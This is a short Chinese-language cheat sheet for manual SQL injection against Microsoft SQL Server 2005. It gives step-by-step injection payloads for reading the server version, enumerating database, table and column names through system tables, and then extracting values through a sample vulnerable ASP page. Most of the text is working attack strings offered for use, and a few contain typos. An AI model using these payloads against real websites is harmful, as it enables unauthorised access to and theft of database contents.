 | XCH40 整理
其中 爆列名有点麻烦
mssql 2005
1:
and 1=(SELECT @@VERSION)-- 判断数据库版本
(master.dbo.sysdatabases 表存放着sql2005数据库系统的所有的数据库信息
查询命令:user master;
SELECT * FROM MASTER.DBO.SYSDATABASES
系统默认的数据库有:1master 2tempdb 3model 4msdb)
2:dbid变量爆数据库名称
AND 1 IN (SELECT NAME FROM MASTER.DBO.SYSDATABASES WHERE DBID=3)
改变DBID值依次爆出!到无法爆出位置~!
3:获取表明
(MSSQL2005 每个数据库都有一个用来存放表明信息的表,PUBLIC权限即可查询!
表明为:INFORMATION_SCHEMA.TABLES
USE MASTER ;
SELECT * FROM INFORMATION_SCHEMA.TABLES;
INFORMATION_SCHEMA.TABLES表的机构:
TABLE_NAME
1 XXX
2 XXX
3 XXX
...
而表明就存在TABLE_NAME的列里)
4:TOP 1爆出表名
AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES)
更换TOP 1 即可爆出其它的。
5:获取爆出表的内容 加上条件语句:where table_name!=0XXXXX (0xxx为上一步你爆出表明的16进制!)
AND 1 IN (SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLENAME!=0XXXXX)
6:爆列名了
MSSQL2005 SYS.ALL_OBJECTS表里存放着表与列的信息,表的列明:其列名OBJECT_ID里存放着一个数值,对应着另一个表名SYS.ALL_COLUMNS里的列明的ID,而SYS.ALL_COLUMNS表里存放着列的信息
执行:select * from sys.all_objects
表的机构
name object_id xxx_id schema_id xxx_id
1 sysXXX 12
2 sysXXX 8
3
4
由结构可知,列名name和列名object_id是有对应的。注入时,通过指定的name值爆指定表的object_id值
AND 999999< (SELECT TOP 1 CAST([OBJECT_ID] AS NVARCHAR(20)) FROM SYS.ALL_OBJECTS WHERE NAME=0XXX
但是此句无法爆出数据值,用折半法来进行猜解,由于其数值都在10位以上,所有,其法也不太可能,但是可以联合两张表来直接查询,在此提交:
AND 9 IN (SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0XXXXXXX)--
就可以爆出0xxxxx的第一个列名,可以加入条件
'and B.NAME!=0X 0X为已爆出的列名,类推可以一次爆出。
AND 9 IN(SELECT B.NAME FROM SYSOBJECTS A,SYSCOLUMNS B WHERE A.ID=B.ID AND A.NAME=0XXXXX AND B.NAME!=0XBBBBBB)--
最终:
表名和列名爆完后:,获取值就很简单
例如: xch40.asp?id=1 and 77=(select ascii(@@VERSION))
xch40.asp?id=1 and 1=2 UNSION SELECT 1,2,3,4...@VERSION--...
| |
